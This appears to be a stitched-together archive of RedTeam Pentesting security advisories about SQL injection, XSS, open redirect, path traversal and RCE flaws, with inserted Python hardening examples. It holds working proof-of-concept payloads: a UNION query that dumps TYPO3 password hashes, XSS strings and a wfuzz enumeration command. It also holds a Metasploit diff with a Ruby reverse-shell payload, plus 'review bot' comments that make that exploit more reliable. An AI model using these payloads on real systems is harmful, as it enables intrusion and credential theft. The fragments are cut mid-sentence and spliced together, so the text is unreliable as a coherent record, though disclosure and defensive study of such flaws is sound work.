2015-06-09 Verified that vulnerability is not fixed in version 1.70
2015-06-09 Vendor responded: vulnerability is already known and being worked on, release date is not known
2015-06-09 Vendor provided list of affected devices
2015-07-10 Vendor queried for update, no response
2015-08-03 Vendor queried for update (by phone)
2015-08-04 Vendor responded: advisory has been forwarded to development.
2015-08-04 Vendor queried for estimated fix
2015-08-13 Vendor announced fixed version 1.71
2015-09-04 CVE ID requested
2015-09-07 RedTeam verified that the vulnerability has been fixed
2015-10-07 CVE ID not assigned, may be "duplicate finding"
2015-10-08 Advisory published

References
==========

[0] http://buffalo.nas-central.org/wiki/Category:LS-WXL
[1] https://www.andreafabrizi.it/?exploits:terastation
[FD] [RT-SA-2015-002] SQL Injection in TYPO3 Extension Akronymmanager
Advisory: SQL Injection in TYPO3 Extension Akronymmanager

An SQL injection vulnerability in the TYPO3 extension "Akronymmanager" allows authenticated attackers to inject SQL statements and thereby read data from the TYPO3 database.

Details
=======

Product: sb_akronymmanager
Affected Versions: <=0.5.0
Fixed Versions: 7.0.0
Vulnerability Type: SQL Injection
Security Risk: medium
Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002
Advisory Status: published
CVE: CVE-2015-2803
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803

Introduction
============

"The Acronym Manager adds special explanatory markup to acronyms, abbreviations and foreign words on the whole site following the requirement to accessible web content. It provides a backend module to administer a list of words to generate new HTML elements for explanatory markup." (from the extension's documentation)

More Details
============

Users with the respective privileges can maintain acronyms through the Akronymmanager extension pages in the TYPO3 backend web interface. In the extension's file mod1/index.php, an SQL query is generated as follows (line 357 and following):

[...]
$pageID = t3lib_div::_GET("id");
if ($pageID)
    $where = "uid='$pageID' AND ";
$result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages',
    $where.'hidden="0" AND deleted="0"', 'sorting');
[...]

The value of the user-supplied HTTP GET parameter 'id' is used without sanitizing it before its use in the subsequent SQL statement. Therefore, attackers are able to manipulate the resulting SQL statement and inject their own queries into the statement.

Proof of Concept
================

When requesting the following URL, the vulnerability is exploited to yield all usernames and hashes from the TYPO3 be_users database:

http://www.example.org/typo3conf/ext/sb_akronymmanager/mod1/index.php?id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password)%20FROM%20be_users),2%20--%20

The login credentials are then embedded in the HTML page that is returned:

[...]
user1:$hash,user2:$hash[...]
[...]

Workaround
==========

Only give trusted users access to the Akronymmanager extension in the TYPO3 backend.

Fix
===

Upgrade the extension to version 7.0.0.

Security Risk
=============

An attacker who has access to the backend part of the Akronymmanager extension may send SQL queries to the database. This can be used to read arbitrary tables of the TYPO3 database and may ultimately result in a privilege escalation if the TYPO3 users' password hashes can be cracked efficiently. Depending on the database configuration, it might also be possible to execute arbitrary commands on the database host. As the attack requires an attacker who already has backend access, the vulnerability is estimated to pose only a medium risk.

Timeline
========

2015-02-25 Vulnerability identified
2015-03-04 Customer approved disclosure to vendor
2015-03-10 CVE number requested
2015-03-10 Vendor notified
2015-03-26 CVE number requested again
2015-03-31 CVE number assigned (request #2)
2015-03-31 Vendor notified again
2015-03-31 Vendor responded
2015-04-08 Vendor announced fixed version available at the end of April
2015-05-13 Requested update from vendor
2015-05-15 Vendor requests more time
2015-05-21 Requested update from vendor
2015-05-22 Vendor states that upload to extension registry doesn't work
2015-06-03 Requested update from vendor
2015-06-10 Vendor uploads new version to extension registry
2015-06-15 Advisory published
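To show what the mod1/index.php pattern above does and what the correct query looks like, here is an added example that is not the extension's code. It rebuilds the page lookup in Python over an in-memory SQLite database with constructed rows and placeholder hashes, once with the GET value spliced into the WHERE clause as in the advisory and once with the value type-checked and bound as a parameter. The advisory's payload is MySQL syntax; since SQLite's group_concat takes at most two arguments, the example uses the equivalent group_concat(username||':'||password) form.

```python
"""String-interpolated versus parameterised page lookup (added example,
not the Akronymmanager extension's code)."""
import sqlite3

# The advisory's injection string, rewritten for SQLite's two-argument
# group_concat; everything after "379" is attacker-controlled.
POC_ID = ("379' UNION SELECT (SELECT group_concat(username||':'||password) "
          "FROM be_users),2 -- ")


def demo_db():
    """Constructed sample schema and rows; the hashes are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (uid INTEGER, title TEXT, hidden INTEGER,
                            deleted INTEGER, sorting INTEGER);
        CREATE TABLE be_users (username TEXT, password TEXT);
        INSERT INTO pages VALUES (379, 'Home', 0, 0, 1);
        INSERT INTO pages VALUES (380, 'Drafts', 1, 0, 2);
        INSERT INTO be_users VALUES ('admin', '$P$placeholder-hash-1');
        INSERT INTO be_users VALUES ('editor', '$P$placeholder-hash-2');
    """)
    return conn


def find_page_vulnerable(conn, page_id):
    """Mirrors mod1/index.php: the GET value is spliced into the WHERE clause,
    so a quote in it ends the literal and the rest becomes SQL."""
    where = ""
    if page_id:
        where = "uid='%s' AND " % page_id
    sql = ("SELECT title,uid FROM pages WHERE " + where +
           "hidden='0' AND deleted='0' ORDER BY sorting")
    return conn.execute(sql).fetchall()


def find_page_hardened(conn, page_id):
    """A page uid is an integer: reject anything else, then bind it as a
    parameter so the value can never be parsed as SQL."""
    params = []
    where = ""
    if page_id:
        if not str(page_id).isdigit():
            raise ValueError("page id must be a non-negative integer")
        where = "uid=? AND "
        params.append(int(page_id))
    sql = ("SELECT title,uid FROM pages WHERE " + where +
           "hidden='0' AND deleted='0' ORDER BY sorting")
    return conn.execute(sql, params).fetchall()


def leaks_credentials(query_fn, page_id):
    """True if the lookup returned be_users data in place of a page title."""
    try:
        rows = query_fn(demo_db(), page_id)
    except ValueError:
        return False
    return any("admin:" in str(title) for title, _uid in rows)


if __name__ == "__main__":
    print("vulnerable query leaks hashes:", leaks_credentials(find_page_vulnerable, POC_ID))
    print("hardened query leaks hashes:  ", leaks_credentials(find_page_hardened, POC_ID))
    print("hardened query, normal input: ", find_page_hardened(demo_db(), "379"))
```

The integer check is the cheap fix TYPO3 code usually applies (an intval on the id); the bound parameter is the one that still holds when the column is not numeric.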
[FD] [RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery
controlled web page. The vulnerability is therefore rated as a medium risk.

Timeline
========

2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released
[FD] [RT-SA-2015-003] Alcatel-Lucent OmniSwitch Web Interface Weak Session ID
Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released
[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite
Workaround
==========

Implement a new filter which validates file names and insert this filter before hybris' own MediaFilter. The new filter should return an error when a file outside the media directory is requested.

Fix
===

Upgrade to a fixed hybris version or apply the vendor's hot fix.

Security Risk
=============

This vulnerability can be used to download files from the file system of the server. This includes, among others, configuration files and the hybris order logfile, which contains sensitive data. Therefore, the vulnerability poses a high risk.

Timeline
========

2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd time, RedTeam Pentesting declines
2015-02-18 Advisory released
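The workaround above asks for a filter that rejects any request resolving outside the media directory. The following is an added example of such a check, not hybris' MediaFilter or the vendor's hot fix: it URL-decodes the requested name, refuses absolute paths, backslashes and NUL bytes, normalises the remainder lexically and then requires the result to lie strictly below the media root. MEDIA_ROOT is an assumed layout, not a path taken from the advisory.

```python
"""Media-path validation for a file-serving filter (added example, not hybris code)."""
import posixpath
from urllib.parse import unquote

MEDIA_ROOT = "/opt/hybris/data/media"   # assumed layout, not from the advisory


def resolve_media_path(requested, media_root=MEDIA_ROOT):
    """Return the absolute path to serve for `requested`, or None to reject it."""
    root = posixpath.normpath(media_root)
    name = unquote(requested)
    # Only plain relative names are acceptable: no absolute paths, no
    # backslashes (a separator on Windows), no NUL bytes, no empty name.
    if not name or name.startswith("/") or "\\" in name or "\x00" in name:
        return None
    # normpath collapses '.', '..' and repeated slashes; whatever is left must
    # still sit strictly inside the media root (the root itself is a directory).
    candidate = posixpath.normpath(posixpath.join(root, name))
    if candidate == root or not candidate.startswith(root + "/"):
        return None
    return candidate


def media_filter(request_path, media_root=MEDIA_ROOT):
    """Filter decision as (status, path): 200 with the file to serve, or 403."""
    path = resolve_media_path(request_path, media_root)
    return (403, None) if path is None else (200, path)


if __name__ == "__main__":
    # Constructed sample requests: two legitimate, the rest traversal attempts.
    for req in ("sys_master/h1/image.png", "sys_master/./h1//image.png",
                "../../../etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
                "sys_master/../../config/local.properties", "/etc/passwd",
                "sys_master/..%5cwindows", ""):
        print(repr(req), "->", media_filter(req))
```

The check is lexical, so it must run on the decoded path the file system will actually see; if the media root itself can contain symbolic links, resolve the candidate with os.path.realpath against the real directory and repeat the prefix test on the result.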
[FD] [RT-SA-2014-013] Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser.

Details
=======

Product: IBM Endpoint Manager
Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE: CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137

Introduction
============

IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage)

More Details
============

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information.
For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
    BESGatherMirrorNew.exe/-gatherversion
    ?Body=GatherSpecifiedVersion
    &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
    &version=1
    &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
    BESGatherMirrorNew.exe/-gatherversion
    ?Body=GatherSpecifiedVersion
    &version=1
    &url=http://">alert(/XSS/)
    &version=1
    &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]
[...]
http://">alert(/XSS/)

Proof of Concept
================

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
    BESGatherMirrorNew.exe/-gatherversion
    ?Body=GatherSpecifiedVersion&version=1
    &url=http://">alert(/XSS/)
    &version=1
    &useCRC=0

Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.

Security Risk
=============

As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk.
Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released
[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to version 1.1.2 allowed users to be redirected to arbitrary URLs. This was possible by specifying the target URL in the URL parameter board_url in URLs like the following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.
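A redirect parameter such as board_url is only safe when the application decides where it may point. The following is an added example, not the plugin's code, of the validation a welcome.php style endpoint can apply before issuing a Location header: local paths and absolute URLs whose host is on an allow list pass, everything else falls back to a default. The allowed host is a constructed sample; the first rejected value is the URL from the note above.

```python
"""Redirect-target validation for an open-redirect parameter (added example)."""
from urllib.parse import urlsplit

# Constructed sample allow list: the forum's own host name(s).
ALLOWED_HOSTS = {"forum.example.com"}


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS, default="/"):
    """Return `value` if it is an acceptable redirect target, else `default`."""
    if not value or any(c in value for c in "\r\n\x00"):
        return default                 # empty, or header-injection characters
    parts = urlsplit(value)
    if parts.scheme == "" and parts.netloc == "":
        # A local path: exactly one leading '/', and no backslashes, because
        # browsers read '/\host' (like '//host') as a scheme-relative URL.
        if value.startswith("/") and not value.startswith("//") and "\\" not in value:
            return value
        return default
    if parts.scheme not in ("http", "https"):
        return default                 # javascript:, data:, scheme-relative, ...
    # urlsplit already strips user-info, so 'https://good@evil/' yields 'evil'.
    host = (parts.hostname or "").lower()
    return value if host in allowed_hosts else default


if __name__ == "__main__":
    # Constructed inputs; the first is the advisory's example target.
    for v in ("https://www.redteam-pentesting.de", "/forum/index.php?page=1",
              "https://forum.example.com/thread/42", "//evil.example/x",
              "https://forum.example.com@evil.example/", "/\\evil.example",
              "javascript:alert(1)", "HTTPS://FORUM.EXAMPLE.COM/x"):
        print(repr(v), "->", repr(safe_redirect_target(v)))
```

Where the redirect is only ever back into the same site, the stricter option is to accept nothing but a local path and drop the allow list entirely.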
[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Tapatalk plugin for the WoltLab Burning Board forum software, which allows attackers to inject arbitrary JavaScript code via URL parameters.

Details
=======

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: >= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869

Introduction
============

"Tapatalk is an app built for interacting with discussion forums on mobile devices. It differs from a forum’s mobile web skin in that it offers the speed of a native app and a streamlined unified interface for every forum a user subscribes to. Tapatalk also creates a unique eco-system that allows forums to be searched and discovered by millions of Tapatalk users which in turn promotes content, new memberships, and interactions." (from Tapatalk's Homepage)

More Details
============

The Tapatalk extension includes the PHP script welcome.php at the path com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php which is accessible via the URL http://www.example.com/mobiquo/smartbanner/welcome.php on systems using the plugin. It outputs JavaScript code that includes improperly encoded values from the two URL parameters "app_android_id" and "app_kindle_url". Depending on which parameter is used, one of their values is assigned to the PHP variable $byo:

[...]
$.getJSON("",function(data){
[...]

Proof of Concept
================

The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php?app_kindle_url=");alert('RedTeam Pentesting');
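The three XSS advisories on this page (Securimage's PHP_SELF in example_form.ajax.php, the url parameter on the IBM relay diagnostics page, and Tapatalk's app_kindle_url in welcome.php) share one root cause: a value is written into a JavaScript or HTML context without the encoding that context needs. The following is an added example, not Securimage's, IBM's or Tapatalk's code. It gives a JS-string encoder and an HTML encoder, renders the two JS templates from the advisories with the raw value (the vulnerable pattern) and with the encoder (the fix), and checks with a small string-literal scanner whether the value stayed a single literal or became code. The prefixes and suffixes are the fragments quoted in the advisories; the payloads are the advisories' proof-of-concept values.

```python
"""Context-aware output encoding for values embedded in JavaScript and HTML
(added example, not code from any of the affected projects)."""
import html
import json


def js_string_literal(value):
    """A double-quoted JS string literal that can neither end the literal nor
    the enclosing <script> element, whatever `value` contains."""
    out = json.dumps(value)   # escapes \ and ", control chars, and non-ASCII (incl. U+2028/9)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("'", "\\u0027"), ("/", "\\/")):
        out = out.replace(ch, esc)
    return out


def html_text(value):
    """`value` for an HTML text or quoted-attribute context."""
    return html.escape(value, quote=True)


def embed_vulnerable(prefix, quote, value, suffix):
    """The pattern in the vulnerable scripts: the raw value between quotes."""
    return prefix + quote + value + quote + suffix


def embed_hardened(prefix, value, suffix):
    """Same template; the literal, quotes included, comes from js_string_literal."""
    return prefix + js_string_literal(value) + suffix


def string_literal_end(src, start):
    """Index just past the closing quote of the JS string literal at src[start], or -1."""
    quote = src[start]
    i = start + 1
    while i < len(src):
        if src[i] == "\\":
            i += 2            # escaped character: skip it
        elif src[i] == quote:
            return i + 1
        else:
            i += 1
    return -1


def literal_intact(rendered, prefix, suffix):
    """True if the embedded value is exactly one string literal followed by
    `suffix`, i.e. no part of the value became code."""
    end = string_literal_end(rendered, len(prefix))
    return end != -1 and rendered[end:] == suffix


# Templates (prefix, suffix) and payloads as quoted in the advisories.
SECURIMAGE = ("new Ajax.Request(", ", {")            # literal is single-quoted
TAPATALK = ("$.getJSON(", ",function(data){")        # literal is double-quoted
PHP_SELF_POC = "/example_form.ajax.php/');}alert('RedTeam Pentesting');a=function(){a('"
KINDLE_POC = "\");alert('RedTeam Pentesting');"
RELAY_POC = 'http://">alert(/XSS/)'                  # HTML context on the /rd page


if __name__ == "__main__":
    for name, (pre, suf), quote, poc in (("Securimage", SECURIMAGE, "'", PHP_SELF_POC),
                                          ("Tapatalk", TAPATALK, '"', KINDLE_POC)):
        raw = embed_vulnerable(pre, quote, poc, suf)
        fixed = embed_hardened(pre, poc, suf)
        print(name, "raw intact:", literal_intact(raw, pre, suf),
              "| encoded intact:", literal_intact(fixed, pre, suf))
    print("relay page, HTML-encoded:", html_text(RELAY_POC))
```

In PHP the JS case is json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) written in place of the whole quoted literal, and the HTML case is htmlspecialchars($value, ENT_QUOTES); the encoder has to match the context the value lands in, which is why neither one is a substitute for the other.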
[FD] [RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components
n.rb index 7803dd5..e72d8c2 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout + # This stub tries to ensure that the payload runs outside of the Rails + # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first -if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp -inp.write(code) -inp.close - end +if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil) + inp.write(code) +inp.close else - Kernel.fork do + def _fork +begin + Kernel.fork +rescue NotImplementedError + -1 +end + end + pid = _fork + if 0 == pid or -1 == pid eval(code) end end @@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty? - match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + match = res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if match diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index f17c669..0100929 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb 
@@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) -"require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" + - "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" + -"(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }" +ruby = <<-EOF +require 'socket' +c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i}) +def reopen(old, new) + begin +old.reopen(new) + rescue IOError => e +new + end +end + +$stdin = reopen($stdin, c) +$stdout = reopen($stdout, c) +$stderr = reopen($stderr, c) +$stdin.each_line{ |l| l=l.strip + +next if l.length==0 + +(IO.popen(l,"rb") { |fd| +fd.each_line { |o| +c.puts(o.strip) +} +}) rescue nil +} +EOF +ruby end end

Workaround
==========

It might be possible to binary patch the Java class files to use a different secret_token value and redeploy the application. This is untested, however.

Fix
===

Install version 9.0.60100 of the affected software components.

Security Risk
=============

The vulnerability allows unauthenticated remote attackers to execute arbitrary code with administrative privileges on the affected systems. It is highly likely that a successful attack on the application server can also be leveraged into a full compromise of all devices managed through the product. This constitutes a high risk.
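Review bot: In the first hunk of rails_secret_deserialization.rb the rewritten comment lost its sentence boundary ("... outside of the Rails process Otherwise, the session ...") and no longer documents the new fallback: when `_fork` returns -1 on NotImplementedError, `if 0 == pid or -1 == pid` evals the payload inside the Rails process, which is exactly the case the old comment warned about (the session can then be killed when the request times out). Restore the period and spell the fallback out, e.g. `# process. Where fork is unavailable the payload runs in-process and` / `# may be killed on timeout.` On Windows the new condition also changes behaviour: a failed `IO.popen("ruby", "wb")` now falls through to the `else` branch, where `Kernel.fork` raises and the same in-process fallback applies, whereas the old code silently did nothing; worth one more comment line so the next reader does not take it for an accident.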
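Review bot: The new cookie regex in the second hunk still requires a literal `;` after the signature (`--([0-9A-Fa-f]+);`), so the session cookie does not match when it is the last cookie in the string and `res.get_cookies` does not append a trailing semicolon; if that can happen, anchor with `(?:;|$)` instead. Allowing `-` in the cookie name and dropping the trailing space are fine as they stand.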
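Review bot: In the shell_reverse_tcp.rb hunk, `rescue IOError => e` binds `e` and never uses it; drop the `=> e`. The `reopen` helper also needs a comment on why it hands back the socket (`new`) when `old.reopen(new)` raises, since that fallback is the only behavioural difference from the one-line string it replaces and the hunk gives no hint which stream or platform it is for. Two style points: the blank lines inside the `$stdin.each_line { |l| ... }` block read as accidental, and because `<<-EOF` is an interpolating heredoc, any `#{...}` or backslash escape added to the payload body later is evaluated when the module builds the string rather than on the target, so the body has to keep its quoting with that in mind.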
Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-08-15 Vendor notified, vendor acknowledges receiving the advisory
2014-09-03 Update requested from vendor
2014-09-05 Vendor promises to respond with more details
2014-09-26 Update requested from vendor
2014-09-30 Vendor promises to respond with more details
2014-10-16 Update requested from vendor
2014-10-16 Vendor responds with CVE-ID, plans release for mid-November
2014-11-06 More definite release schedule requested
2014-11-12 Vendor plans release for last week of November
2014-11-21 Additional details requested from vendor
2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control
2014-12-01 Vendor announces imminent release
2014-12-01 Vendor releases security bulletin and software upgrade
2014-12-02 Customer approves public disclosure
2014-12-02 Advisory released

References
==========

[0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses
[FD] [RT-SA-2014-011] EntryPass N5200 Credentials Disclosure
se from vendor. Customer discontinued use of the product and approved public disclosure
2014-10-20 Contacted vendor again since no fix or roadmap was provided.
2014-10-28 CVE number requested
2014-11-14 CVE number assigned
2014-12-01 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                      Tel.: +49 241 510081-0
Dennewartstr. 25-27                          Fax : +49 241 510081-99
52068 Aachen                                 https://www.redteam-pentesting.de
Germany                                      Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-009] Information Disclosure in TYPO3 Extension ke_questionnaire
Advisory: Information Disclosure in TYPO3 Extension ke_questionnaire

The TYPO3 extension ke_questionnaire stores answered questionnaires in a publicly reachable directory on the webserver with filenames that are easily guessable.

Details
=======

Product: ke_questionnaire
Affected Versions: 2.5.2 (possibly all versions)
Fixed Versions: unknown
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://kequestionnaire.kennziffer.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-009
Advisory Status: published
CVE: CVE-2014-8874
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8874

Introduction
============

"The TYPO3 extension kequestionnaire allows to easily and quickly create and evaluate individual questionnaires online in any TYPO3 website."
(translated from the official website of ke_questionnaire)

More Details
============

Files containing the answered questionnaires are stored in the "typo3temp" directory within the TYPO3 installation. As the source code of the ke_questionnaire extension shows, the filename of an answered questionnaire is solely based on the questionnaire ID and the user ID of the user who created the questionnaire. Source code (shortened):

--
function init() {
    global $BE_USER,$LANG,$BACK_PATH,$TCA_DESCR,$TCA,$CLIENT,$TYPO3_CONF_VARS;
    $this->temp_file = 'tx_kequestionnaire_temp_'.$this->q_id.'_'.$GLOBALS['BE_USER']->user['uid'];
    [...]
}
[...]
function createSchedulerTask(){
    $myVars = $GLOBALS['BE_USER']->getSessionData('tx_kequestionnaire');
    $file_path = PATH_site.'typo3temp/'.$this->temp_file;
    [...]
}
--

A valid URL that returns the answers to a questionnaire could look like the following:

http://www.example.com/typo3temp/tx_kequestionnaire_temp_15999_7

Proof of Concept
================

Using the tool wfuzz[1] it is possible to search for answers to questionnaires on a TYPO3 site that employs ke_questionnaire:

$ python wfuzz.py -c -z range,14000-15000 -z range,1-10 --hc 301 \
    http://example.com/typo3temp/tx_kequestionnaire_temp_FUZZ_FUZ2Z

Workaround
==========

The webserver config should deny access to answered questionnaire files, for example by adding an .htaccess file that limits access to tx_kequestionnaire_* files (this may hinder online evaluation of the questionnaires).

Fix
===

No official fix available.

Security Risk
=============

Depending on the questions in the questionnaire the answered questionnaires may contain personal information including participants' full names, addresses and so on. The risk therefore strongly depends on the information supplied in the questionnaires. Since this information will at least often contain email addresses, it is rated as at least a medium risk.

Timeline
========

2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-06-15 Vendor releases updated version which according to them does not fix the issue
2014-10-08 TYPO3 security team says the issue is still unresolved
2014-11-04 Vendor continues to release updated versions, no response whether the security issue is fixed
2014-11-14 CVE number assigned
2014-12-01 Advisory released

References
==========

[1] https://code.google.com/p/wfuzz/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
[FD] [RT-SA-2014-007] Remote Code Execution in TYPO3 Extension ke_dompdf
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf

During a penetration test RedTeam Pentesting discovered a remote code execution vulnerability in the TYPO3 extension ke_dompdf, which allows attackers to execute arbitrary PHP commands in the context of the webserver.

Details
=======

Product: ke_dompdf TYPO3 extension
Affected Versions: 0.0.3<=
Fixed Versions: 0.0.5
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
Advisory Status: published
CVE: CVE-2014-6235
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235

Introduction
============

"DomPDF library and a small pi1 to show how to use DomPDF to render the current typo3-page to pdf."
(taken from the extension's description)

More Details
============

